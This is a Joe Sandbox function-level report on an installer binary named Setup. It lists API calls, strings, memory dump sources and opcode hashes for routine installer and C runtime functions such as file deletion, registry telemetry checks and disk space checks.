                                                                                              Function 6394C280 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394C287
                                                                                                • Part of subcall function 6394C224: __EH_prolog3.LIBCMT ref: 6394C22B
                                                                                              • OutputDebugStringW.KERNEL32(?,?,?,00000008,6394C856), ref: 6394C2A8
                                                                                                • Part of subcall function 6396807A: SysFreeString.OLEAUT32(00000000), ref: 63968087
                                                                                                • Part of subcall function 6396807A: SysAllocString.OLEAUT32(00000000), ref: 63968096
                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,00000008,6394C856), ref: 6394C2CF
                                                                                              • OutputDebugStringW.KERNEL32(?), ref: 6394C2DC
                                                                                              • LocalFree.KERNEL32(?,?), ref: 6394C2ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$DebugFreeH_prolog3Output$AllocFormatLocalMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3239379132-0
                                                                                              • Opcode ID: a3a83d05e5636f6b6df9ac55a0a98b0802feae5acf2192cc589c79ee498da7ef
                                                                                              • Instruction ID: 959cb022d6b04331a7d7a8f4325c6bb896df6de7d13e6591f485069b874d5de5
                                                                                              • Opcode Fuzzy Hash: a3a83d05e5636f6b6df9ac55a0a98b0802feae5acf2192cc589c79ee498da7ef
                                                                                              • Instruction Fuzzy Hash: E7015A70D1420AEFEF14ABE0CC04AAF7A78BF16B05B104525F511B51A1DB71DA10CF20
                                                                                              Function 63967BEC Relevance: 7.5, APIs: 5, Instructions: 37fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(?,00000000,?,63950FC5,205ABF9D), ref: 63967BFB
                                                                                              • DeleteFileW.KERNEL32(?,00000000,?,63950FC5,205ABF9D), ref: 63967C0E
                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,?,63950FC5,205ABF9D), ref: 63967C1E
                                                                                              • GetLastError.KERNEL32(?,63950FC5,205ABF9D), ref: 63967C28
                                                                                              • MoveFileW.KERNEL32(?,00000000), ref: 63967C41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Delete$CloseErrorHandleLastMove
                                                                                              • String ID:
                                                                                              • API String ID: 4022683281-0
                                                                                              • Opcode ID: ac6a17239fc4e4f1f38b5103b0b37a3a6ad1335d7c780b8a132dc8db858f1fea
                                                                                              • Instruction ID: 8f726ec3dbdee80d2b88ad49edaa6e4c0f77d9a727d6e0f8ec50a495c26a70ed
                                                                                              • Opcode Fuzzy Hash: ac6a17239fc4e4f1f38b5103b0b37a3a6ad1335d7c780b8a132dc8db858f1fea
                                                                                              • Instruction Fuzzy Hash: AEF0303190A2149FEB113F65C808B8A3BADDF53B9AB040425F949D5201EB39C5A08EA6
                                                                                              Function 6396E60F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 6396E61B
                                                                                                • Part of subcall function 63969BE0: __getptd_noexit.LIBCMT ref: 63969BE3
                                                                                                • Part of subcall function 63969BE0: __amsg_exit.LIBCMT ref: 63969BF0
                                                                                              • __getptd.LIBCMT ref: 6396E632
                                                                                              • __amsg_exit.LIBCMT ref: 6396E640
                                                                                              • __lock.LIBCMT ref: 6396E650
                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 6396E664
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                              • String ID:
                                                                                              • API String ID: 938513278-0
                                                                                              • Opcode ID: 4767a5aeef15f637e83bbf81c99454771d4a54446150dce21ee93769433ddede
                                                                                              • Instruction ID: 025aa6680902e54811d619d2b131676925d460fb9a657f475979df697dd3bd4a
                                                                                              • Opcode Fuzzy Hash: 4767a5aeef15f637e83bbf81c99454771d4a54446150dce21ee93769433ddede
                                                                                              • Instruction Fuzzy Hash: 5CF09032D4B720EBFB21BB788E0174E72A4AF17FA8F145109E411AB1C0CF24C940CE99
                                                                                              Function 6C5EB397 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 380COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcschr
                                                                                              • String ID: ::$DATA$\\?\$\\?\UNC\
                                                                                              • API String ID: 1497570035-1379090233
                                                                                              • Opcode ID: 708d7fdbf48c63ec3293fdfa6da75fd200c3125cde27cc0101cd85e88019c8bd
                                                                                              • Instruction ID: d7dc22e0a913087aa8f2223040e7d53fb483ad54ef8188317eb5397c04f6856a
                                                                                              • Opcode Fuzzy Hash: 708d7fdbf48c63ec3293fdfa6da75fd200c3125cde27cc0101cd85e88019c8bd
                                                                                              • Instruction Fuzzy Hash: 1FD1D271C01309EACF20EF56CC40A9E77B5FF4835AF548516E8659BD50E3B4DA80CB99
                                                                                              Function 639660A8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 233COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639660AF
                                                                                                • Part of subcall function 63967341: __EH_prolog3.LIBCMT ref: 63967348
                                                                                                • Part of subcall function 63967341: GetLastError.KERNEL32 ref: 63967364
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 639662D8
                                                                                                • Part of subcall function 6395EB56: __wcsicoll.LIBCMT ref: 6395EB74
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ErrorExceptionLastRaise__wcsicoll
                                                                                              • String ID: Blocking Services$No Blocking Services
                                                                                              • API String ID: 1137283054-2473106011
                                                                                              • Opcode ID: 022ac152b9f52226b601f6ab0484b4fe1f53c555eebf1cc72635767c022d8b07
                                                                                              • Instruction ID: ad94ad5527b2d80f92069b4a6120bce08e981f0c5195a5884df372347c412fb9
                                                                                              • Opcode Fuzzy Hash: 022ac152b9f52226b601f6ab0484b4fe1f53c555eebf1cc72635767c022d8b07
                                                                                              • Instruction Fuzzy Hash: AF916A70A0120ADFEB00CF68C984A9EB7B4FF56718F148259E855EB291D734EA55CFA0
                                                                                              Function 63953E14 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 233COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63953E1B
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Height$Hide$Width
                                                                                              • API String ID: 431132790-1313002608
                                                                                              • Opcode ID: a8f2ef2a7fdd7ddae45a9fdb54f625e4a19b8e3b8d2bfd6b30433e5565bb7d1b
                                                                                              • Instruction ID: d82cfb0538552d265ef9f206e5520e32686a864b77536a061f47ad9eb6de7355
                                                                                              • Opcode Fuzzy Hash: a8f2ef2a7fdd7ddae45a9fdb54f625e4a19b8e3b8d2bfd6b30433e5565bb7d1b
                                                                                              • Instruction Fuzzy Hash: BBA13B719013089FDB01DBA8C984B9EBBF8AF19728F244159E424EB391D735DA45CF61
                                                                                              Function 6395C7AB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 212COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395C7B2
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • GetStringTypeExW.KERNEL32(00000000,00000001,?,00000001,?,63945D9C,?,00000030,80070057), ref: 6395C86B
                                                                                                • Part of subcall function 639681DE: _memcpy_s.LIBCMT ref: 63968224
                                                                                                • Part of subcall function 6395ECE8: _wcschr.LIBCMT ref: 6395ECFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$StringType_memcpy_s_wcschr
                                                                                              • String ID: </a$href
                                                                                              • API String ID: 3166021290-1826667848
                                                                                              • Opcode ID: cbb2886e73bc0504ad0f1f6ff4d40f03578314d66382a83fd0f92e29a8402289
                                                                                              • Instruction ID: 1fd781110843af31eb10626811cd88cc1019510036f0552f47d6c3646f882416
                                                                                              • Opcode Fuzzy Hash: cbb2886e73bc0504ad0f1f6ff4d40f03578314d66382a83fd0f92e29a8402289
                                                                                              • Instruction Fuzzy Hash: B2714CB1D0121A9FDB14DFA4C4949EEBB78EF00F64F144119F922A7291D734E996CF80
                                                                                              Function 6C5DAA10 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 6C5DA9D3
                                                                                              • memset.MSVCRT ref: 6C5DAA5F
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                              Strings
                                                                                              • Microsoft\Windows\Sqm\Upload, xrefs: 6C5DFF0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile_vsnwprintfmemset
                                                                                              • String ID: Microsoft\Windows\Sqm\Upload
                                                                                              • API String ID: 1199674523-1629975561
                                                                                              • Opcode ID: e10648ff8a05678236072bdbc8646dee169b80ccb0a6088260453eb77047167e
                                                                                              • Instruction ID: 15963b020562c74978de5d6543938c381e12f31f180ba4ea44d3627ce663dcda
                                                                                              • Opcode Fuzzy Hash: e10648ff8a05678236072bdbc8646dee169b80ccb0a6088260453eb77047167e
                                                                                              • Instruction Fuzzy Hash: 1871F530641398ABCB51CF18CD84FDB3BA9EB55308F660AC5E924D6E91D370E9858F89
                                                                                              Function 6395883F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 146COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63958846
                                                                                                • Part of subcall function 63961169: __EH_prolog3.LIBCMT ref: 63961170
                                                                                                • Part of subcall function 63961169: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 639611B1
                                                                                                • Part of subcall function 6395EB56: __wcsicoll.LIBCMT ref: 6395EB74
                                                                                                • Part of subcall function 63961360: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,Action,6397FE10,?,?,?,205ABF9D,Action,?,00000000), ref: 63961395
                                                                                                • Part of subcall function 63961360: GetLastError.KERNEL32(?,?,?,205ABF9D,Action,?,00000000), ref: 639613A5
                                                                                              Strings
                                                                                              • $$AvailableSpaceOnSystemDrive$$, xrefs: 6395897E
                                                                                              • $$SystemDrive$$, xrefs: 63958895
                                                                                              • $$RequiredSpaceOnSystemDrive$$, xrefs: 639588FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DirectoryDiskErrorFreeLastSpaceSystem__wcsicoll
                                                                                              • String ID: $$AvailableSpaceOnSystemDrive$$$$$RequiredSpaceOnSystemDrive$$$$$SystemDrive$$
                                                                                              • API String ID: 2351290856-2773778658
                                                                                              • Opcode ID: 2b005a68aa16bac5d1a08b979523c0378066cdcbcb9e0a349b9c53a18929a0a2
                                                                                              • Instruction ID: c8387739c5605812b6a8f46383abe17ac98150046df1ba38b29e804735749a25
                                                                                              • Opcode Fuzzy Hash: 2b005a68aa16bac5d1a08b979523c0378066cdcbcb9e0a349b9c53a18929a0a2
                                                                                              • Instruction Fuzzy Hash: 0551A272A04208CFDB04CBB8C984BDDBBF4AF1A728F144165E954EB382D734D9548F91
                                                                                              Function 63951003 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63967ACF: GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 63967AFC
                                                                                                • Part of subcall function 63950ECA: SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 63950F06
                                                                                              • PathFileExistsW.SHLWAPI(?,?,205ABF9D), ref: 63951126
                                                                                              • ShellExecuteW.SHELL32(00000001,print,?,00000000,00000000,00000000), ref: 6395116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExecuteExistsFileH_prolog3MessageSendShellTemp
                                                                                              • String ID: %s\BlockersInfo%d.rtf$print
                                                                                              • API String ID: 2742019059-575943144
                                                                                              • Opcode ID: 097b1dbfbd6739a69bc897c29ebbfb11b037bb731061f9792fdb5fe1c6966a91
                                                                                              • Instruction ID: a11853ddc843937e2f364ba637ee86f46bed0b3f4cf93ce2571813fe942c7e69
                                                                                              • Opcode Fuzzy Hash: 097b1dbfbd6739a69bc897c29ebbfb11b037bb731061f9792fdb5fe1c6966a91
                                                                                              • Instruction Fuzzy Hash: 60416D725083459FD710DF68C844A5FBBE8FF9AB2CF040A29F098A7251D731D9598F62
                                                                                              Function 6C5E97BA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL$|Z^l
                                                                                              • API String ID: 471583391-4098726421
                                                                                              • Opcode ID: 972402b493c0ed92e02f55359b0c7debc57974cb96eccc42d8fd886130a97c27
                                                                                              • Instruction ID: c9a4bda74289b1a276968caa465ed14d9252548c1b8cbf7b073bbfa0f9a07102
                                                                                              • Opcode Fuzzy Hash: 972402b493c0ed92e02f55359b0c7debc57974cb96eccc42d8fd886130a97c27
                                                                                              • Instruction Fuzzy Hash: E3313872A0C206DFCB049F4DCC55ADA3771FB8E708F298615E5556B9A0E7B0DA81C380
                                                                                              Function 63955ECE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63955ED5
                                                                                                • Part of subcall function 63953AD4: __EH_prolog3.LIBCMT ref: 63953ADB
                                                                                                • Part of subcall function 6395396A: __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395434E: __EH_prolog3.LIBCMT ref: 63954355
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: RepairRadioButton$UninstallRadioButton$UserExperienceDataCollection
                                                                                              • API String ID: 431132790-1241949946
                                                                                              • Opcode ID: 2128cf160ecc72ef16087ad293e3138ce01ad85faa099a690211244129baf65b
                                                                                              • Instruction ID: ca3e897ccd67c38443cb14d2a10dec251018fe926260653466c4c1ce5e3ea2e2
                                                                                              • Opcode Fuzzy Hash: 2128cf160ecc72ef16087ad293e3138ce01ad85faa099a690211244129baf65b
                                                                                              • Instruction Fuzzy Hash: CD415E71500348AFDB00DBA8C944BDEB7A8AF29718F584459F559E7281DB30EA98CF21
                                                                                              Function 6C5D3E29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: CEIPEnable
                                                                                              • API String ID: 3677997916-1389088331
                                                                                              • Opcode ID: 60cc6a5128412c43c52e1c31109c582036fa3ccb1a27f980a14c525c60cb97aa
                                                                                              • Instruction ID: 08a26e7e684fe78a2bdfc112862db3a5d55dee0d3e05601ae49f20d5e5422a45
                                                                                              • Opcode Fuzzy Hash: 60cc6a5128412c43c52e1c31109c582036fa3ccb1a27f980a14c525c60cb97aa
                                                                                              • Instruction Fuzzy Hash: 4531D231644348ABCB05DE48DD80F9A7BB5EB85348F260256FA20DADB1C371E980DF58
                                                                                              Function 6395381C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63953823
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: HTML$RTF$Type
                                                                                              • API String ID: 431132790-2981198847
                                                                                              • Opcode ID: 5d4f0983252d51528190cca36b7c65a0fe7a2757decdd814bf4fa5819991d24f
                                                                                              • Instruction ID: f3a0f25e7c19b3d61b907548252780a2231e8cba0932e3922dba8f853a2ec998
                                                                                              • Opcode Fuzzy Hash: 5d4f0983252d51528190cca36b7c65a0fe7a2757decdd814bf4fa5819991d24f
                                                                                              • Instruction Fuzzy Hash: 23319C7180030A9BEB14CBB8C9807AEB7B4AF15B28F184299F520E72C1D771DA948F90
                                                                                              Function 6C5D84A3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTime.KERNEL32(00000000,00000000,?,?,?,6C5D833E,?), ref: 6C5D84AF
                                                                                              • SystemTimeToFileTime.KERNEL32(6C5D833E,6C5D833E,?,?,?,6C5D833E,?), ref: 6C5D84BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File
                                                                                              • String ID: MSQM$x
                                                                                              • API String ID: 2838179519-3648152566
                                                                                              • Opcode ID: 6133eac015d52eb0457b5b876c300b03604d55eb91937dbf131fbd97e5d92ca1
                                                                                              • Instruction ID: 3b9f516ac39090b1f4694c1f13a8948088145ea2df69c257be96e0b92c75fd6a
                                                                                              • Opcode Fuzzy Hash: 6133eac015d52eb0457b5b876c300b03604d55eb91937dbf131fbd97e5d92ca1
